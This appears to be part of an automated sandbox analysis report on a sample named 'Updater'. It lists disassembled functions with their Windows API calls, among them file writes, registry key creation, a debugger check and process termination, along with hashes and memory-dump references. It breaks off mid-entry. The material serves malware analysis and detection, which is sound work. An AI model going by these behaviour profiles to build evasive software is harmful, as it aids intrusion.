Opcode Fuzzy Hash: 73c1a51bc362858e621e64e5b4ea5b33f5890aabd3f75c2ec00891cc8cb15558
Instruction Fuzzy Hash: 9721027068830A8FD721EBA1C8C1BC97774EB75724FA1456FEE00972B5C67C980A8A71

Function 006E10B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 007271AE

Part of subcall function 006D119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D1192,?), ref: 006D11BF

Part of subcall function 006EFDB9: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006EFDD8

Strings

(sy, xrefs: 00727192
X, xrefs: 0072717C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: (sy$X
API String ID: 779396738-2170681109
Opcode ID: ecc6481f19e371ee3ce1cffba23b1d863a2e043b11735107832dae113d3e6e36
Instruction ID: f3eb0f2bb221d331a110a99a03cb13718ac47e1dca22e3a2df2c6a20410304bf
Opcode Fuzzy Hash: ecc6481f19e371ee3ce1cffba23b1d863a2e043b11735107832dae113d3e6e36
Instruction Fuzzy Hash: C721A130A14298ABCF45DFA5DC057EE7BFA9F49310F00801EE904AB241DBF85989DFA5

Function 006F042B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 006F0C74

Part of subcall function 006F440C: RaiseException.KERNEL32(?,?,?,006F0C96,?,00000001,?,?,?,?,?,?,006F0C96,?,007994C0), ref: 006F446B

__CxxThrowException@8.LIBVCRUNTIME ref: 006F0C91

Strings

Unknown exception, xrefs: 006F0C9E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: e6f9379cf10a99f1fcb715490abccf2f6ef84f39bdf0ac82e6e8d1c6faf6d821
Instruction ID: bfcef9570390a3f647e1dbda201b36e6a86d68b6e514321b501004876e0c1b51
Opcode Fuzzy Hash: e6f9379cf10a99f1fcb715490abccf2f6ef84f39bdf0ac82e6e8d1c6faf6d821
Instruction Fuzzy Hash: CFF0286490020CF79F40BAA8E812EBE77AE5E00304FA08228BB1495993EB71D516C1C4

Function 00758974 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00758D10
TerminateProcess.KERNEL32(00000000), ref: 00758D17
FreeLibrary.KERNEL32(?,?,?,?), ref: 00758EF8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 5f618be27dddcdac8cf5eda1110cc8cd5d2829d20a1e5eaa45691f97479ee6a2
Instruction ID: a043e94253ae4a007c66e9d260e0e843957cefb34799b8ba18d613a8c66336ee
Opcode Fuzzy Hash: 5f618be27dddcdac8cf5eda1110cc8cd5d2829d20a1e5eaa45691f97479ee6a2
Instruction Fuzzy Hash: 09127A71A08341DFC750CF28C485B6ABBE1FF88315F04895DE8899B392DB75E949CB92

Function 006E1CF6 Relevance: 4.6, APIs: 3, Instructions: 104COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 006E1D9F
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 006E1DAF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 811211883c47750197dc276713cd699553fa3dab3470268b0e5d2129a0148b86
Instruction ID: d7c407ef901d2b405683847290e5e0c331f130689a646b2cc8d2282de2ce5dc3
Opcode Fuzzy Hash: 811211883c47750197dc276713cd699553fa3dab3470268b0e5d2129a0148b86
Instruction Fuzzy Hash: A0314931A01759EFDB18CF69CC80B99B7B6FF05314F14862AE9149B280C771BDA4EB90

Function 006E3619 Relevance: 4.6, APIs: 3, Instructions: 76timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006E37B5: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006E38A8

KillTimer.USER32(?,00000001), ref: 006E36A2
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006E36B1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00727D4E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 951af77e4767aef9ea7defa4ed91e08b042fb563bcf7d9c8d01ef7d6e6678dfe
Instruction ID: 9fe5d1ddcd15adad1723368679caf7d89ff3250c43d188e78fe618063ea828ea
Opcode Fuzzy Hash: 951af77e4767aef9ea7defa4ed91e08b042fb563bcf7d9c8d01ef7d6e6678dfe
Instruction Fuzzy Hash: 7531B170A083A4AFEB32CF34D885BE6BBEC9F06304F00449EE59A97241D7781A85CF55

Function 007084DE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,007083FC,?,00799910,0000000C), ref: 00708534
GetLastError.KERNEL32(?,007083FC,?,00799910,0000000C), ref: 0070853E
__dosmaperr.LIBCMT ref: 00708569

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 69e1102102839844e91015f32a02da80f57aa9abe12d0792c20cddf310e4ca96
Instruction ID: 16396df81177334b309263f6650c2f6ef5f104547027d4973833948dd6f6288b
Opcode Fuzzy Hash: 69e1102102839844e91015f32a02da80f57aa9abe12d0792c20cddf310e4ca96
Instruction Fuzzy Hash: BC016B32A00260DAD3A41338AC4973F27CA4B82734F258318F964C71C3DEBC8C818656

Function 014B5FE5 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 014B602B
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 014B6052
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 014B6077

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction ID: b00b233dfd9633ecf343c660060d4b993cabc6eb08099a738ad7d9ce0a5565f7
Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction Fuzzy Hash: F3113075A0021D6BDB15DA9ACC81EEFB3BCAF6C310F41056AF614D7260D6B09A448BA0

Function 014B6409 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B644E
WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6466
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6472

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: b6c4271d2ba4b9495cbc9bb6ffc6d609fe08f28e71ef0019f7bc28b32552d8bb
Instruction ID: ca9cb55bc6a159d3b77c002520a69ac92eb40b0d98420877768d7ac6c730d1ff
Opcode Fuzzy Hash: b6c4271d2ba4b9495cbc9bb6ffc6d609fe08f28e71ef0019f7bc28b32552d8bb
Instruction Fuzzy Hash: 8101D4716016047FE720DEA98C82FAE76ACDB69B10FA2457AB514E31E0DAB45E005564

Function 007091BB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,0070926A,FF8BC369,00000000,00000002,00000000), ref: 007091F4
GetLastError.KERNEL32(?,0070926A,FF8BC369,00000000,00000002,00000000,?,0070598F,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,006F6AFC), ref: 007091FE
__dosmaperr.LIBCMT ref: 00709205

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 9c14f165b1fec29e51933f5bb6c703b11eab564a09223632054e65ff8156d727
Instruction ID: 2ff04a6a1dcd1e4ed007daa940192738c83e0fc3f36e7d40ebadc89dfe6b4198
Opcode Fuzzy Hash: 9c14f165b1fec29e51933f5bb6c703b11eab564a09223632054e65ff8156d727
Instruction Fuzzy Hash: DF012833B10219EBCB159F99DC0986E3BA9EB85320B240349F911972D1EAB99D01C790

Function 014B83BD Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,014B84C2), ref: 014B8437
RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,014B84C2), ref: 014B846B

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 08629a5642657d2d058cc2dec7dea50e967ba9f756feb8055d9d53de856c47db
Instruction ID: ebb18254801c7a474c0db0ee399399c4e1005333b4c6e80fd756a866c95a71bc
Opcode Fuzzy Hash: 08629a5642657d2d058cc2dec7dea50e967ba9f756feb8055d9d53de856c47db
Instruction Fuzzy Hash: 8B316635A0020A7FEB11DBA5CC80BDFB7BCAF28300F54847EA514E7260D7799A058760

Function 006E1E10 Relevance: 3.1, APIs: 2, Instructions: 65fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,00000000,?,?,006DC03B), ref: 006E1E6E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00008000,00000000,?,00000000,?,?,006DC03B), ref: 006E1EA7

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: a7dc69b721628f35f9331eb87841b0d9bc575e089e6f552a41b7d884ebbc2b51
Instruction ID: 8d5db6b1987ea973a41b8df0890fe781900dc696151c2d1c4c9c93e1ba8f3fd6
Opcode Fuzzy Hash: a7dc69b721628f35f9331eb87841b0d9bc575e089e6f552a41b7d884ebbc2b51
Instruction Fuzzy Hash: 25215635200705AFD730CF16C885BA6B7FAFF09710F10882DE99A8B690C7B1B946DB60

Function 006E1EE8 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,006DC025,?,00008000), ref: 006E1F16
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,006DC025,?,00008000), ref: 00727483

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2551c7dfc7d36d4007745adba71050b1d5389b2eb1a1ac84f596e913b13838a9
Instruction ID: e28bcc6f8454b4976c0afcbc4b7acde40697685fe1534b9ceea2614f21a1bc70
Opcode Fuzzy Hash: 2551c7dfc7d36d4007745adba71050b1d5389b2eb1a1ac84f596e913b13838a9
Instruction Fuzzy Hash: C7018030245365B6E3351A2ACD0EF977F99EF06B70F108200FAA95E1E1C7B45855DB94

Function 006EFC28 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 006EFC4A

Part of subcall function 006EFC98: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006EFCAD
Part of subcall function 006EFC98: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006EFCC4

Part of subcall function 006E2D33: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006E2D63
Part of subcall function 006E2D33: IsDebuggerPresent.KERNEL32 ref: 006E2D76
Part of subcall function 006E2D33: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006E2DE2
Part of subcall function 006E2D33: SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 006E2E63

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006EFC84

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 90424e73f440d847b245c804ce90505a974c0cb670b15675329cb5ad602b6b3f
Instruction ID: 1c067bce9e12b8ca20a30b2c5175f19b9369ecb708ff381e3790b0a99f2251b6
Opcode Fuzzy Hash: 90424e73f440d847b245c804ce90505a974c0cb670b15675329cb5ad602b6b3f
Instruction Fuzzy Hash: 5CF0B4316503489FEF00AB68EC0AB163BA2A747705F108815F605464E3CBFD4492CB8D

Function 014B661A Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,014B66B4), ref: 014B6693
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 014B6699

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: f6fb5117d9105a2b2c19a13f44afa531c516638e31241b704d7cd0aabd1a6483
Instruction ID: abb4b055f2c755600770c589ca0b3dd1e25e8880178f318a8b66258eaffa8dac
Opcode Fuzzy Hash: f6fb5117d9105a2b2c19a13f44afa531c516638e31241b704d7cd0aabd1a6483
Instruction Fuzzy Hash: 11E0BF75504105BEE710EFA5DDC1EAD77FCEB7C300FA1446BF545D2160DA75AA058B20

Function 014B5FB1 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,?,014B8785,00000000,014B88EC,?,?,00000000,00000000), ref: 014B5FBD
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,?,?,014B8785,00000000,014B88EC,?,?,00000000,00000000), ref: 014B5FDA

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
Instruction ID: 6d8d7c53e5a231a9879c9a6ceaf09e6baf5c5885eaf0bc2ce43ec0ec8476afa4
Opcode Fuzzy Hash: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
Instruction Fuzzy Hash: 10D0C7557016211FD55131BD0CC5E9B858C4F3C271FA50617F515DB2F1D6744D5211B0

Function 014B961D Relevance: 3.0, APIs: 2, Instructions: 5COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,014B997D,00000000,014B9998,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 014B961F
TerminateProcess.KERNEL32(00000000,00000000,014B997D,00000000,014B9998,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 014B9625

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
Instruction ID: ab22fb1c91c30b31c97404961e6679e47734c7a4c4f6f4c5ce47938ccc1b9991
Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
Instruction Fuzzy Hash: B390025854D30310DC4072B20D09F0904083B74705FC6044A5108550E05DF89501B025

Function 0149DABD Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0149DE50), ref: 0149DAEC
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0149DE50), ref: 0149DB13

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 98cd51d575aa20dcbb898b3ebb450b99b899cd637f74d0361bd9f4bad5e59b29
Instruction ID: 0fea438d0aecfbcac09ca2b82958f873b60898a0b8fcaf810ef4193ba1f49fcd
Opcode Fuzzy Hash: 98cd51d575aa20dcbb898b3ebb450b99b899cd637f74d0361bd9f4bad5e59b29
Instruction Fuzzy Hash: 92F08272F0462156EF21A9EA4CC4F535D949F696A0F154076FA1CEF3EED6B14C0142A1

Function 006D37F2 Relevance: 2.1, APIs: 1, Instructions: 616COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb94bb72e22a057d1434bdfbbaf7108e2f2614367df46ee6ee7d06e278afce15
Instruction ID: cd25466099b363765bea7372c691eea5dfc4d8010c701a21b321b3320fc22eda
Opcode Fuzzy Hash: cb94bb72e22a057d1434bdfbbaf7108e2f2614367df46ee6ee7d06e278afce15
Instruction Fuzzy Hash: 0C421674A08351CFC764CF19C49066AB7F2BF99304F24895EE9898B390D735EE81DB86

Function 006FEC36 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70cc77e84de0c5cea011434bb30626aad89b5e06dd27061bbd7ab3816aa6ddad
Instruction ID: c00e1b32fa73883996757a081ab389f7ddf566f7312b3d724be9059afc1cf85d
Opcode Fuzzy Hash: 70cc77e84de0c5cea011434bb30626aad89b5e06dd27061bbd7ab3816aa6ddad
Instruction Fuzzy Hash: C851C771A0015CAFDB10DF68C844AB97FB7EF85364F198158E9189B7A2C772ED42CB90

Function 00740156 Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0074016F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: a62047b5d1ca813e45c09ac32ea829f49ec2de3aff729339135127a7b9d9a599
Instruction ID: 6e22340b09f328e3b285da52eb989050fbe2b6912cdc5dd46a5612c68fc97029
Opcode Fuzzy Hash: a62047b5d1ca813e45c09ac32ea829f49ec2de3aff729339135127a7b9d9a599
Instruction Fuzzy Hash: 8F4195B6A00209EFDB11EFA4C8459AEB7F9FF44310B10852EE61697291EB74DE44CB90

Function 006F02C0 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 006F036F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

